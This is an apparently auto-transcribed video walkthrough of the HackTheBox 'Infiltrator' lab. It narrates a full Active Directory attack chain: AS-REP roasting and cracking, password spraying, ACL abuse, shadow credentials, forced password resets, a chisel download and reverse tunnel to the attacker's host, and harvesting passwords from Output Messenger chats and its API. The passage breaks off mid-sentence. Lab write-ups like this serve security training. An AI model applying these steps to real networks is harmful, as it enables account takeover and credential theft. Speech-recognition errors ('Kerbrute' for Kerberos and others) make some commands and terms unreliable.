What's going on YouTube? This is IPSEC, me doing Infiltrator from HackTheBox, which is an insanely long machine. It starts off with scraping names off a website and then using username anarchy to find the naming convention because one of the users is ASREP Roastable, which gets us a password that we can run Bloodhound with. Then we find an Active Directory attack chain involving several takeovers to get to a user that has WinRM access, which we can use to tunnel into the domain to access Output Messenger, and we cycle through several accounts there, finding various pieces of information like a .NET binary we have to reverse, an API key to Output Messenger, which we can use to read more messages, and also one of the users is logged in, and Output Messenger's calendar feature enables us to run an application on a task, so we use that to get access to their account, which has a bitlocker key saved, which allows us to access an encrypted drive and grab the backup that contains NTDS.DIT, which we get another password from and do an Active Directory certificate services attack. Anyways, I probably missed a couple of steps, so let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, SV, enumerate versions, -vv for double verbose. This gives us things like the TTL, OA, output all formats, put in the nmap directory and call it Infiltrator, and then the IP address of 10.10.11.31. This can take some time to run, so I've already ran it. Looking at the results, we can see 13 ports open. The first one is DNS on port 53, and the banner tells us it's Simple DNS Plus, which is the default for Active Directory. And scrolling down, we do see Active Directory is installed, and it's also giving us the fully qualified name, just the domain name, and I think the net BIOS name of the domain. So let's go ahead and add this to our host file just so we have this all ready for us. So sudo v etc host, and then we can add 10.10.11.31. And then let's paste this in, delete that. So now we have the fully qualified name, the domain name, and then just adding the machine name as well. So now that that's done, let's go over the rest of nmap. So DNS, not surprising, we have a web server. This is going to be IIS, so it looks like they have some type of homepage set up. Then we have Kerbrute, some RPC stuff, LDAP, which we already looked at a little bit, and there's going to be quite a few LDAP services. SMB, Kerbrute, there's the second LDAP, and we'll probably see 2 more LDAPs before this is over. 3268, another one. And 3269, that's the SSL of 3268. I want to say this LDAP is for a global catalog. That's not really all that important. So let's just see if there's any other ports. And it looks like there is. We have 3389, which is Microsoft Remote Desktop, or they call it Microsoft Terminal Services. So RDP is on this box, which is a little bit odd. We normally don't see RDP on HackTheBox, but that is it. So let's go ahead and take a look at the site. And because this box is so long, I'm going to skip out on some recon things. Like normally I'd run netexec to see if there's open shares and things like that. But I'm just going to skip that out because if we did recon at every single step, this video probably would be 4 hours long. I'm trying to avoid that. We'll see what happens. But going to the page, we just see a standard page. We can check if it's like index.html. Looks like it is. If we do an invalid extension, we get 404 file not found. So it looks like a static website. We can look at the page source to see if there's any indications what built this. And I don't think there is. So just scrolling down, let's see. We have a place to enter an email to subscribe. Let's see. Looks like employees. We have David Anderson, Olivia Martinez, and this is on a carousel. So we have a potential list of employees there, and then a contact us form. So we don't really have any information. We could potentially try to use this for cross-site scripting, but saying HTML, if it was like ASPX, maybe I'd go for that, but I don't really know what I would fish. We could run GoBuster and see if there's any login panels, or fuzz for virtual host. But again, that's going to take a long time if we do all that recon. What I'm going to do is grab a list of all these users and build a potential username list. And then we can use Kerbrute to identify any valid users. So let's go ahead and do that. So to start off, I'm just going to do a curl 10.10.11.31. And then I remembered Olivia was one of the names. So I'm just going to look at, oh, I mistyped it. There we go. Look at what Olivia looks like around it. We have H4. So she's in header 4 tags. If we just grep for header 4, let's see. We get a list of the users. We get some stuff we don't really care about. So what I'm going to do is grep H4 period and then a number. And that should just get me a list of users. Let's see. I screwed something up. I'm going to do -s -q to hide the download thing, but I'm not sure what I messed up there. Okay. I guess I don't need to escape all those, but there we go. So all I want to do is grab the names. I don't want all this data. We could use like cut, sed, awk, things like that, but I'm going to do this all in grep. So we're going to do -op because this is overpowered. Really, this is just doing regex Perl syntax, I want to say. But what I need to do is we'll do dot number. We'll say any amount of numbers and then a space. So now that's going to just show us that. Then I'm going to add dot star like this to match everything after. Maybe I need the question mark there. There we go. And we want to go up until that. Okay, so we have this matched, but we just want to extract the names. So what I'm going to add is a \k to say reset the lookup filter right there. And there we go. We just have a list of the names. We still have the less than sign. So what I'm going to do is change this to a positive lookup filter by doing a parenthesis question mark equals and then that character. And what that means is going to look up until that character and not include it. Let's see. Can I do H maybe? So if we did H, then it's going to go up until the H. So yeah, so that's the positive lookup filter. There we go. And I'm going to pipe this over to potential names.txt. And then I'm going to use a tool called username anarchy. So do username anarchy, then the file of potential names, file not found. Let's tell it the full path. And there we go. We have a list of names. This probably should have been called potential names. I'll just do users.txt or potential users.txt, I guess. And we look at that. There we go. So now we can use Kerbrute. So I'm going to do Kerbrute and then user enum. Let's see, -h. Let's see what flags there are. If we just do Kerbrute -h, you can see all the things. We have brute force, brute user, password spray, but I just like the user enum feature. So let's specify the DC of 10.10.11.31, the domain infiltrate. Is it infiltrate or infiltrator? Cat Etsy host infiltrator. There we go. .htb. And then we need the username file, which was potential users.txt. And there we go. And if you're running the development version of Kerbrute, which means you have to download it from Git and then build it yourself, if you just do the release, it's not going to automatically do an ASREP roast. So we see potential valid usernames. L Clark has his password as, I want to say it's like can be stored in reversible encryption or something like that for the ASREP roast. So let's go over to the Kraken. And then let's go cd hashcat. And then v hashes, and I'll call this infiltrator.asrep roast. Paste this hash. And then let's go ahead and run hashcat. So we can do /hashcat, the hash file opt word list rocku.txt. And let's see what we end up getting. And it does not crack. Why? So it detected Kerbrose 5 E-type 23. And we are Kerbrose 5 E-type 18. Oh, that's right. I don't think hashcat can actually crack this format. This is going to be a better version of the encryption. I think it's like AES and we wanted MD5 or something like that. So to do this, let's get out of hashcat and go back to Kerbrute. If we do -h, there is a downgrade. So we can do --downgrade, or we could go to like netexec at this point. There's plenty of ways to do ASREP roasting. Is there a continue? Thread, safe, downgrade. I don't know why it stopped after 1. L Clark was the user, so I'm just going to do L.Clark and that file. That is weird. There we go. We have the type of 23 now. So let's go ahead and copy this, go back into the Kraken, cd hashcat v hashes infiltrate, replace that with type of 23. And now we can do hashcat. So run this again, and hopefully it ends up cracking. Recovered 1 out of 1. And if we look, we have what is my pass? So let's go ahead and save that. And I'm going to reattach my tmux, close out a hashcat, and then let's do, v creds.text, l.clerk, and then we have this password. So let's go ahead and run netexec to look at all the users. So do nxc smb 10.10.11.31, user l clerk, and then the password of that. And we should probably use the full name. I normally use IP addresses with netexec, but we really should get in the habit of using the host names because that does matter when you end up doing Kerbrute things. So that is a success. If we do -- users, it's going to dump a list of all the users. So let's see. There we go. We have administrator and we get password last set. And we also have K Turner has a password in this. So this is messenger at pass. So let's go ahead and try logging in with k.turner just to see if this password works. So we can do this password and then k.turner and nothing. So at this point, we can do two things really. We can do a password spray and we can also run Bloodhound. And I'm probably going to do both of them. So let's do v passwords.text and we're going to put message past that. And then let's see. Let's grab this. What is my pass? Okay. And do users. This is in password still. There we go. And now let's go ahead and grab a list of all the users. Okay, that should be fine. V temp, let's just paste this. Cat temp, awk, print, what is that? 1, 2, 3, 4, 5. Like that. There we go. Users.text. We have some extra things that we don't need. So let's clean this. Computer domain guest 2. There we go. So now let's do nxc smb 1010. Let's just hit the up arrow a few times. There we go. And we can do -u, user.text, p, passwords.text. So that's going to perform a spray. And while that happens, I'm going to run Rusthound. And I'm switched over to Rusthound from Python because we actually have to do, hold on, continue on success. There we go. Because Rusthound will capture all the certificate information. I found the Python ingester, even when used the community edition one, misses out on a lot of good data. But Rusthound does a better job with that. The downside with Rusthound is you can't do a pass the hash attack, but you can use Kerbrute, so I think you can normally work with just an NTLM hash, but all that is irrelevant because we don't need to use a NTLM hash because we have a password. So we want to do -d, -u, and -p. So let's do Rusthound -d infiltrator.htb -u l clerk. And then let's go ahead and grab this password. So this what is my pass? We can grab that. -p like that. If we run it, looks like it is retrieving things. I could have done the --zip to also zip everything up, but everything's fine in JSON files. Let's see, do we have any successes? So there's some with account restriction. So I wonder if that means the password was valid and it's just a protected account, which means we can't log in that way. Let's see. I'm going to go ahead, grab all these again. Vtemp. Let's delete this. Paste. Let's see, grep-v, log on, fail on temp. And let's see, we have a few hits. D. Anderson, M. Harris. We have D. Anderson here multiple times. That's odd. But M. Harris. Let's see if we can log in with M. Harris in this password. So if we do this, and we'll specify m.harris, testing 1, 2, 3. And we still get account restrictions. So no matter what, we're always going to see that, which is good to know. We could try D. Anderson as well, but I'm sure that's the case. Let's see. We already got Bloodhound data, so let's go ahead and run Bloodhound. So let's do opt Bloodhound server docker compose up-d. And this should start Bloodhound, I think on port 8088 is what my Docker has it set to. We'll see. 127, I think I did localhost 8088. It's not up yet. So we're just going to wait for this to start. Shouldn't take too long. And there we go. Bloodhound should be started. Refresh. And looks like we can log in. So let's log in, then we'll upload all our data and then see what attack paths we have. Still loading. No data is available. Start uploading. There it is. Upload files. And then let's do HTTP, Infiltrator. We'll upload all of this JSON. Press upload to continue. It's ingesting. And it doesn't take too long, but I'm going to pause the video and we'll resume once this is all ingested. Okay, we're done ingesting. I'm also going to disable my dark reader and then use Bloodhound's dark mode because I find dark reader makes Bloodhound go unbearably slow. But now that we're here, we can search for our user that we have, which was L. Clark, and just go ahead and mark them as owned. So we'll do this. We'll do add to owned. And then let's go over to the Cypher queries and let's see what we can do. So if I go to Active Directory, then let's go with shortest paths to system with unconstrained delegation. Sure. We can see a few paths. So right here, we see this account is probably important, this land management account, because that can, oh, did not mean to mark as owned. Whoops. Hold on. Let's undo that. Let's remove. I meant to do high value. Stop moving around. But this can read GMSA passwords. So we may want to find a way to get there. Yes. And then from that, we can get to this Infiltrator service account, which can perform a ADCS exploit number 4 over to the domain. So that's potentially a privesc. Not much else we can go off of. I'm going to look at show shortest path from owned objects. And let's see what we have. So we see L. Clark as a member of this marketing team, domain users, and not much else. I do want to try one thing real quick. Now that I'm thinking about this, let's do that NXC again. So we'll do NXC, SMB, and we want to do users.text, .text. Where is that? We're going to do the password spray and specify Kerbrute. Because if it was a protected user account, then you have to use Kerbrute to log in. So like that. Let's try this. And we'll see if we get any more hits. I probably should add continue on success. Hold on. Get rid of that. Continue on success. And we'll see if we get anything. D. Anderson, L. Clark. So we do get an extra hit of an account. It didn't work for M. Harris, but we do get D. Anderson as well, so we can mark them as owned. So if I go to search, let's do D. Anderson, like this. We'll do add to owned, go back to the cipher query of shortest path from owned principals, and there we go. We have something else. So we can see D. Anderson's over here. And I know this text is small. It's not really easy to show this, right? We see D. Anderson has generic all over this marketing digital at infiltrator.hdb OU, and that contains the E. Rodriguez user, who can then add himself to the chief marketing group, which then has force change password over M. Harris. So that is the attack chain. We have to go from D. Anderson, take over this OU, take over this user, add them to this group. And yeah, let's show that. But before I do, I just want to show this real quick because I didn't really explain this. But if we do D. Anderson with the valid password, because we're doing NTLM authentication, we get status account restriction. And even if we put a invalid password there, the error message is the same because NTLM login is disabled, right? So what we have to do is tell it to do a Kerbrute login. And now we get pre-auth failed, and that's because we have an invalid password here. If I fix the password up, that's when we'll get a success. So whenever you see the status account restriction, probably means your password attempt's not even working at all just because you can't log in over that protocol. But let's now go ahead and jot down what we want to do, right? Because this is going to be a few steps. We're going to use D. Anderson to take control of the OU. So we're going to abuse that generic all to take control of this. And then after that, we're going to create a shadow credential for E. Rodriguez, if I can spell that correctly. We could also probably change their password because we have generic all, but if we change their password, you always want to avoid that when you can. We know the shadow credential is going to work because one of the paths did show us ADCS was installed, and that's the prereq to being able to do shadow credentials. So after that, we want to add ourselves to the group. So add ourselves to marketing group. And once we do that, we will be able to, let's see, force a change password. Force M Harris password change. So that's going to be the steps overall, what we're going to do. So let's go ahead and start that. So I'm going to start off with a dacledit, and this is going to be using impacket. We'll do action write dash writes, and this is case sensitive, the full control piece. I think we want inheritance. What is it? Let's see, inheritance. There we go. What else do we need? The principal. So that's going to be who we're giving full control to. And then the target DN is going to be this marketing group. Where is the OU? CN. There we go. I'm going to get the distinguished name there. Okay. And then we need to specify Kerbrute. The IP is going to be infiltrator.hdb. And I know that's not an IP, but that flag works either way, I think. And now we have to do our login. So infiltrator.hdb, D. Anderson, and then that password. It's on this pane. Grab this. Run it. So what we're doing is giving ourselves full control, and it's going to inherit on child objects. cache not found. Dacle has been modified successfully. So now that we have full ownership there, we're going to use certify now. And that's going to give us the shadow credential. So let's do certify, then shadow auto Kerbrute, the target DC01, infiltrator HTB, users D, Anderson at infiltrator.htb, password. I don't have that in my clipboard anymore. Let's grab this. Copy. Paste. And then after this, we need to specify the account we want a shadow credential to. So e.rodriguez. Let's see. If this failed, then run the Dacle edit again, because it's possible that some auto cleanup may have fixed it. But it looks like we've done it. We're authenticating with the certificate. It's trying to get the TGT. And after that, we will get the hash. So once we get the hash, then we're going to add ourselves to the marketing group. So we're just waiting for this TGT to come back. There we go. We have the hash for E. Rodriguez. So we can copy this. And now we're going to use bloody AD. I hope I have that installed. I do. Awesome. E. Rodriguez. I think I spelled that right. And then the password, if we do a colon and this, it's going to do hash authentication. The host is going to be DC01 infiltrator.htb, domain infiltrator.htb. And then let's see. We want add. Okay, so it's going to be add group member. Then what is the group called? This is Chiefs Marketing. So Chiefs Marketing. E. Rodriguez. So E. Rodriguez has been added to this group, which means we should be able to set a password. So let's go back. And then we're going to use bloody AD again. And this will just be set password M Harris. And we're going to set it to please subscribe exclamation point. And if you use impacket or netexec, it's going to set the password, but it's going to be a weird password because it doesn't set the Kerbrute keys. So I always like using bloody AD to set the password. There are flags to make it happen in impacket, but since it's not a default, I always make that mistake. And when you set it, it says AES key is blank until the user changes the password again. That's never a good thing. But there we go. We have E. Rodriguez's password changed. So let's do a get TGT now, like that. Or not E. Rodriguez. M. Harris's password is changed. So we can do a get TGT and then infiltrator.htb M. Harris : please subscribe. There we go. And I like just saving the ticket at this point, because if the password changes back, as long as a Kerbrute ticket is still within its validity time, it's still going to work. So whenever I change passwords, I always like getting a TGT ticket afterwards, so I don't depend on the password still being changed. So now that I have this, we should be able to see what M. Harris can do. Let's go search. We can do M. Harris. Set to owned. And I think it even showed it in the last graph I just had. Let's see. Where is M. Harris? D. Anderson, E. Rodriguez, M. Harris. Let's see, it's a member of protected users and remote management. So this means we can use WinRM because we're in remote management users. And to use Evil WinRM, we'll have to fix up our Kerbrute config on our computer. So I'm going to use nxc smb, and then we'll do infiltrator.htb and tell it to generate the KRB5 file. and I'll call it infiltrator-kerb.conf. And this should create this file for us. So if I cat it now, we can see it just does all this config for us. So all I have to do is sudo cp the file to etc kerb5.conf. And now I should be able to use evil winrm. So let's do evil winrm. Then we'll say -k. What is it? I think -i dco1 infiltrator.htb, and then the realm of infiltrator.htb. And we also have to specify the kerb5cc name. And this was created by the git tgt command. If I do a ls, we can see we have this mharrisc cache file, and that's going to be what it is. So specifying this, we have an error. So evil winrm -i -r -k. We're missing IP. We have that there. Do I not do -k for evil winrm? -k is private key. So definitely not. Let's just do -i and -r. And there we go. We have a shell as mharris. So that was the big attack chain to get as mharris. Now let's see what we can do here. We can start off with a whoami/all just to see what privileges we have. If we're in a dangerous group, I think Bloodhound would have shown it. So there's nothing really too interesting there. We go and do a tree/f. We can see any files. There is user.txt, but nothing really there. If we do a cd/, let's see, there is inetpub, so we can try going into inetpub, and then let's see, www root. Can we create files here? Echo1 to test. We can't create files. So what I was testing for here is if we create a ASPX file, maybe we can get a shell as the www user, and then that would let us get SE impersonate privileges or something like that. So nothing there. We can go into program files. So we do that, do a dir. We can see something odd. We have output messenger and output messenger server. That's the only thing non-standard. We can go do the same thing and the x86. Nothing non-standard there. If we look at the running ports, let's do find string, is it TCP? If we looked at UDP, it would just go on forever. But let's look at what TCP ports are open. There's going to be a ton because this is a domain controller. But the PIDs tell us a lot. If it's a low number PID, this is probably going to be a system service. We have this 6416 PID 7044 8112. So there is a few. Let's see. Let's just make notes. What is it? Let's do 6416 7044 8112. So now I'm going to run a get process. And then we can just look at this. So 6416, that's going to be OM server service. 7044, that's output messenger HTTPD. I'm guessing 8112 could also be related to it. So we see that's going to be MySQL. So let's see. We could potentially try to access MySQL, but let's instead, first we have to get Chisel in the box so we can proxy ports. So that's what we're going to start off with. So let's go ahead and do that. We'll do make dir www, cd www, and then cp opt chisel, chisel.exe over here. HTTP server, program data. And now let's do a curl HTTP 10.10.14.8 8000 chisel.exe-o chisel.exe. Don't know if that downloaded. Let's just copy this. Every now and then evil winrm just crashes. Program data. Try this again. Being used by another process. Let's just do c.exe. I think when Evil WinRM crashed, it never like freed up the file right on it, and now that's just a weird thing. What's in program data? We got MySQL, VMware. Let's go in output messenger server. There's a temp. Let's go in output messenger. Profile, what's in here? Chat room. Maybe I should use the tree command. Nope, we're at that limit. So I was looking for exactly like where the MySQL config could be so we could just get the password, but I don't think we really do anything with MySQL. So we'll just leave that be. So let's get chisel working on our end. So let's do cd opt chisel, and then we'll do chisel server. Was it SOCKS 5? Port is going to be, I like doing 8081. And let's see. We also want to allow reverse. There we go. Let's do /c.exe client 10.10.14.8 8081. And then we're going to say reverse SOCKS. There we go. So now we get logged in, or we got the port forward working. I'm going to Google output messenger. And we're going to see if we can install this software. Let's turn Dark Reader back on. Downloads. There is a Linux download. So let's go ahead, download the Ubuntu 64-bit client, save it. And then we can say sudo dpackage-i downloads output messenger to install it. And while that goes, I'm going to look at my proxy chains config. And we see SOCKS 5, 127.0.0.1, 1080. And my proxy chains is listing on 1080, so that looks good. So let's do proxy chains, output messenger. Hopefully that works. There we go. And this is going to be a little bit small because I don't think there's a way to really zoom in on this window. And we also get a lot of errors. I don't know exactly what it is, but the Linux client is not great. It's not even loading right now. It normally goes better than that. Maybe we'll just switch to Windows. Let's see. There we go. So now we got the page. So we have username, password, server IP. Since I use proxy chains, I can do 127.0.0.1, and that's going to proxy to the server. And then we need credentials. We could try lclark and then this to see if it's hooked up to Active Directory. So if we do l.clark, sign in, we see traffic going, and oh, we do sign in as lclark. I actually did not expect that. So this is definitely buggy. We can click on users to see if we have any messages with them. Here's the general complaints regarding the stability. It's telling to use the Windows client. Anything with the marketing team, Martinez, general chat, that's where we were, marketing team chat. Nothing really there. If we click on notes, this may take a while to load, calendar. Okay. This is taking a while, but let's see. There was another password we had, which was this messenger app pass to someone. I forget who that was. We got it with the -- user. So I'm just going to run that again to see who had that set as their description. And we'll see if anything's different when we log in as them. So let's go through here. That is k.turner. So let's grab this. Proxy chains. And we could probably also use the web client as well. But the web client has even less features than the Linux. Start it again. Come on. There we go. That password. And now that it took so long, I forgot what it was. It was like Turner, right? Was it k.turner? Let's see. Yeah, k.turner. K.turner. Sign in. Okay. If we click on admin, no chats there. Martinez, nothing there. Nothing here. We do have a dev chat. So if we look at dev chat, we have M. Harris. Come on. Let's just maximize this. Using LDAP, they're talking about some type of program. And the admin is asking M. Harris to send it to him. Let's see, offline users. If we click on M. Harris, do we have any chat with them? We don't. We can click on this, which is the wall, and that should have data, I think. I think this client's just not pulling that data up. Let's see. I may just switch over to Windows. New post. Okay, there we go. Finally, the data loaded. So if we look at the wall, we see k.turner is leaking M. Harris's credentials. So let's try logging in as M. Harris. Oh, let's just try. We already logged in as M. Harris because we set his password. We can potentially log into him as the messenger application. So let's go ahead and try that. So let's kill proxy chains here, start it back up. There's probably a sign out feature that I should be using, but yeah. Oh, it did not. My clipboard's not there. Shoot. We have to do k.turner again real quick. I'm going to pause the video. I'm going to grab that password and put it on my clipboard, and we'll log in with him. Okay, sorry about that, but we got the password here. I always hate it when you close an application, it wipes your clipboard. But there we go. We can sign in as M. Harris, and we get logged in. And the last message said M. Harris was talking with the admin. So if we click on the admin chat here, we can see there is a executable. So I'm going to click download, and no such file or directory. Did it not download? If we do a ls, let's see. Do we have anything here? I don't think it downloaded. Let's see. Can I do like a save as? It's not wanting to download. Make directory, no such file. It looks like it can't create a directory. So let's just go ahead and switch over to Windows because this is getting a bit buggy. And before we do that, we have to forward all the ports. So let's do output messenger ports. And there's going to be a few we need to forward. Let's see, do we have them? If we go to the server installation, I think it will say. So we have a list of ports here. And the reason why I'm doing this is because our Windows machine will need to be able to, what is it? connect to this box, right? And the easiest way is just to stand up port forwards on our parent box in order to send them over here, because I don't know if Windows has like a concept of proxy chains. So I'm just going to do it all this way. So let's make a connection back to the box. We can go into program data, and then we'll do ./c.exe client 10.10.14.8. What port do we use? 8081. And then we're going to need to send a few ports. So looks like 1421, 1422. Let's do reverse 14.121. I'm going to send it over 14. Is it 14121? It is. And that's going to go to 127.0.0.1, 14121. Let's do 14125. Okay. And then finally, we'll do 14126, 127.0.0.1, 14126. So that's going to take these ports, send them through Chisel, and end up on this client and hit it, right? So on my box here, we're going to listen on all IP addresses on port 14121. That's right here. So really, this rule looks like this, but we don't write them this way that often, right? But what it's doing is listening on all IPs on 14121, sending it through Chisel. It's coming out the client's end because it's a reverse, and then hitting this, right? So our server is just going to be a complete proxy to this 14121. And I'm also going to, no, that should be fine. Let's just send all these. Cannot listen. 14125. Are we listening already? LNTP. Oh, wait. We need to add the reverse. There we go. Because if reverse isn't there, it's going to try to open up port 14125 on the client, and it can't because that's where the server's running. There we go. We have all those ports forwarded. If we just grep for 141, we can see all IP addresses listening on those ports. So now I'm going to go over to Windows. We're going to install Output Messenger, and then we're going to log in. Okay, I'm over on my Windows box. We're going to download the installer. I just downloaded the zip. Probably should have downloaded that installer. We'll see if this works. Looks like it's just an executable. So we can copy this here. And I do not know what that background is. I think Windows just randomly changes things, because I definitely did not set that. But there we go. We'll install it. And while that installs, I forgot I need to get my IP address of my Linux box. I'm trying to. There it is. Let's do an IPA. And we are 30.130. I hope that's not, I think that's a NATed address. Hold on. Settings. It is. So I need to change this to bridged so the two hosts can talk to each other. And that's probably going to screw everything up. Oh, man. Hopefully not. Reconnect. Does my chisel, will this automatically keep working? TP, 8081, curl. I think it may have. 127.0.0.1, 14121. Set is open. Let's do IPA. There we go. This is the IP I want. So we can copy this, go back to my Windows, and server IP or host name. We're going to put this, continue. There we go. And what was it? I think M Harris. And then I'm going to grab the password again, Paste this in. It's connecting. Hopefully it all works. If it doesn't, I'll probably pause the video and reset the tunnels up. But it looks like we have successfully connected. Account has access to a new device. Okay, that's fine. Let's see. What did we want to do as M. Harris? We want to go to admin and download that application. So we can do this, download. I think it's downloading. Maybe? Maybe we have to forward more ports. Download. I think I'm going to go and forward more ports because I'm guessing that's the issue. So let's go to connection back here again. CD program data. And then I'm going to forward a different port. We're just going to copy this command so we have it. If we look here, port 14122 is used for file transfer. So let's just try again forwarding that. So we can do 14122 like that. Okay, it looks like it has connected. Hopefully this now works. Download. And still does not look like it wants to. Let's see. I don't have wireshark. Oh, wait, there we go. Finally downloaded. I was going to try to open up wireshark and see what port it was trying to talk to. In the chats, it said this was a .NET binary. So I'm just going to open up ilSpy, and then we're going to analyze it. So I can do open, desktop, user explorer. And then let's poke around in this. It is looking like it's still probably decompiling. Decryptor. Let's see, decrypt string. So we got AES. It's doing UTF-8. Looks like it's a blank initialization vector. Let's see, ciphertext. And we need to see what the key is. Let's see, decrypt. Nothing there. Decrypt string. Where is this called? Do we have like... I do not. Let's go to LDAP app. Nothing there. Go to main. Let's see. We got WinRM service. We got the ciphertext. And then we have the key. So this is everything we need. I wish I could have these in 2 tabs easily. Let's go to CyberChef real quick. CyberChef. Is this it? Looks like it. Is there a dark mode button? I don't think this is the right CyberChef. There we go. Let's see, options, theme, dark. Awesome. Okay. So let's look at what it gives us. We have the ciphertext, which is in base64. So let's copy this. I'm going to put it as the input. And when this is going to be from base64. Okay. And then the decrypt string, this is going to be the key. But if we go in here, it's doing AES UTF-8. Let's see. Crypto stream. Let's just do an AES decrypt real quick. AES decrypt. We need the key. We can paste that in. The initialization vector. It's just doing 16 bytes, but I don't see it ever being set. So that is annoying all those messages. There we go. That's blank 16. It's unable to decrypt right now. Let's see. What mode is it? ASIV, memory stream, stream reader. Let's see, decrypt. I could have sworn I saw like what mode it was being decrypted in, but I don't see that anymore. Let's see, stream, transform. We can just change this to see CFB doesn't look anything. CTR, CBC no padding. Let's see. Input or input's actually gonna be raw because we base64 decode this. And then our key, I think is UTF-8. Yeah. And I got UTF-8 as the key because we see AES key, UTF-8, get bytes. So this looks like it is CBC, no padding, and we get another base64 string when we try to decrypt it. We paste it again, and it looks like we potentially get the password. And I don't know if those carets are part of the password or not, but let's try. So the username, if we go back over to main winrm_svc. So let's try seeing if we can log in. So we can do, was it NXC, SMB, DC01, Infiltrator.htb, winrm. I think I did the password that correct. Come on. There we go. winrm_svc. winrm. There we go. Let's see. I'm guessing those carets are not part of the password. Oh, maybe it is. Take that away. Yep. So now we have the winrm service password. So let's go back over to Bloodhound. We can search and we'll mark the winrm account as owned. And let's see what we have from here. So we can mark this as owned. And then if we look down at outbound object control, let's see. We can enroll some certificates, but none of these are dangerous because we don't see like the ADCS exploit. It should tell us if there were any. So it doesn't look like anything really comes off. Let's rerun our shortest path from owned. And here we go. We see winrm, member of remote management users, and that is about it. So let's just go ahead and log into the messenger as this winrm, and then we'll log in as winrm itself and see if there's anything. If we go back here, how do I log out? Display messages, sign out. Do I have the, I do not. winrm_svc. We can grab this password, sign in, connecting. Let's see, account has been accessed from a new device. That's fine. Let's go to admin. Do we have anything here? Does not look like it. This is ourself, Martinez. Okay, so we have some messages with Martinez. He's saying, or she is saying, Olivia, they're getting random pop-ups on the desktop every day at 9 a.m. Haven't shared the password, no one else. So it looks like Olivia says the password has been shared to the chief marketing chat group. So we want to try getting into that chat group. And I don't see a way. Maybe if we click settings, chat rooms, no permission to add. and we can't edit. So it doesn't look like we can get into the chat room from this user. If we click around on other things, if we look at the notes, there's this API management note, and there's a LAN management API key. So let's copy this, and I'm going to send it over to my parrot. Let's call it key real quick, paste that in, and then let's see exactly what the API key can do, because maybe this API key has a different auth, and we can read chat room messages. That would be pretty much exactly what we need. So let's go over to Google, and then we're going to search for Output Messenger API. And this should bring up some documentation. Looks like maybe this page. Let's see. Introduction. Okay, so here we go. We have to give it the header of an API key, and they give us the user's endpoint, and it's on port 14125. So let's try this. We're going to do a curl HTTP 127.0.0.1 and then paste this in. It should fail because we're missing the authorization token. We can also just do a JQ dot. Let's do -s-q, and there we go. So let's go ahead and copy this key, and then we'll add a header to our curl. So let's look at what it is. API -key, paste in our key. And now when we run this, it looks like it works. So we have just dumped all of the users, right? So now let's go look at this API. We want to look at a chat room. I'm guessing it's going to be the room endpoint. So I'm going to go into room, which is chat room API there. And then for creating a chat room, you can use post. I just want to get a chat room. Is there a get? Retrieve. So we do API chat rooms and then room. So API chat rooms, and then the room, what was that? It was like chief something. Let's see. What chat was that in? Is it admin? It's probably another user. It was like the chief marketing room or something. Let's see. I wonder if there's like a list room. We just hit this. Awesome. So if we just hit the endpoint, we get a list of all the rooms. It was definitely in the chief's marketing chat that the user said they entered their password. So let's grab this. And then let's see. We could just retrieve the room. Okay. Let's see. How do we edit a room or add a user? That's going to be the first thing I do. We got logs, so we can read the logs in my chat room. Update. Let's see. We can do a put to potentially update a room. So I'm going to try that first. So I think we can just do -x put for a method. Chief marketing. And then let's say room name is equal to this, and room users is equal to. Grab these two. And then we're logged in under the WinRM service user. So let's see if we can add that. We probably got to put that in single quotes because we have the pipe character, which would do funky things to our shell. This looks fine. Invalid numeral. What? Let's see. What is this? Length required. 411. So if we do a -v, this is going to show what we say. We put. This goes in. That looks fine. Curl API key. We don't really have a length. Length required. Don't know. Let's see. What if we did -h? Was it content length 0? No permission to access. So it does not look like we can edit the room. Let's do 10. So it's waiting for me to send data. So yeah. So we have no permission to access this endpoint, which means we can't edit the room. That's weird that we need a content length. I wonder if put request is expecting these parameters in the body. That's definitely odd. So we're left with trying to get the logs for the room. And this is a get, and we need something called the room key. And we don't have this. If we just did a get and looked at all the rooms or this, there is no room key for this. So for this, we'll need to go back onto the box. And we need to get on as the WinRM SVC user, which I don't think I put the password down. So I'm going to run nxcdb. This is going to go in the net exec database. I can do proto smb, and then we can type creds, because I validated the cred with this, right? So it saved it for me. We've got WinRM SVC, and then here's the password. So let's try this. Evil WinRM -I. We'll do 10, 10, 11, 31 -u WinRM SVC-P. Put in this password and make sure it's in quotes. And let's see if we need Kerbrute. We don't. Awesome. So now we're the WinRM service. We can do a tree to see files in our directory. And it doesn't look like we have anything. Tree is not going to go into like app data. And this is going to be where there's hidden files. So let's see, is there anything here? Let's see. Local, roaming. So we got roaming, output messenger, and we got two databases here. Temp, I don't know what those are. Nothing interesting. So let's go ahead and check out the databases. So we're going to go roaming, output messenger. So cd roaming, cd out. Maybe this will get me there. And then ja. And there we go. We got two databases. So I'm just going to try download, and we'll see if download works. Looks like it may. Let's do download ot.db3. Okay. We can exit the NXC database. And now let's use SQLite to dump them. And it looks like ot and om.db3. So we can do SQLite 3 ot.db3.dump and see what data is in this. So we have an insert here. It's into task settings. And this does not look really useful to me. Looking through the rest of this, it doesn't look like there's anything here. So let's try looking at the OM database. So we can do this. We probably also need the less. And this has a lot more data. So we're inserting into output messenger user master. And it looks like we got some users here. So maybe this is like the buddy list or something. I don't know exactly what it is here, but I don't see any like password hashes. So I don't think it's like internal database thing. It's probably just how the application works, I'm guessing. User photo. Let's see what else we have. The reminder table, custom status, groups. Here we go. We have a chat room. And then one of the column names is chat room name and chat room key. And that is going to be the third one. So if we look here, we got general chat. We're in OM chat room 1, 2, 3. So this should be the chat room key. So hopefully this gets us everything we need. So we can go back to this request. Let's see, chief marketing chat. Let's go here. What do we need? Question mark room key is equal to that. And it did not get me anything. So let's see, we did API chat rooms. We need logs. So chat rooms. So we don't use the chat room name. We just do logs. And logs don't exist. But if we do a from date and to date, so let's just copy this. So we can say, and from date data, that's not it. Date, and I also need to now put this in single quotes. There we go. Chat room logs don't exist. Let's do a to date. Is it just 2? To date is equal to, we'll do 20, 25, 12, 12. And we have data. And this looks like it's going to be HTML. So let's just do a jq.log. Is it logs? There we go. -r for raw. And then I'm going to put this as page.html. And I'm going to use Firefox page.html to open it. And here we go. We have this. Hope you're doing well. What tasks? Thanks. How about you? Sure. And here we go. We got Olivia's password. So let's do v creds. I'm going to save it this time. Like that. Awesome. And let's go and copy this. And we're going to go back over to Windows to log in. And if we remember, Olivia was complaining about a box popping up on her computer constantly, right? So with that in mind, when we sign in, let's do was it Martinez? I can't remember. I'm taking that as no. Oh, nope, there we go. So there we go. We're logged in as Olivia. We can look at admin messages to see if she said anything to the admin. It doesn't 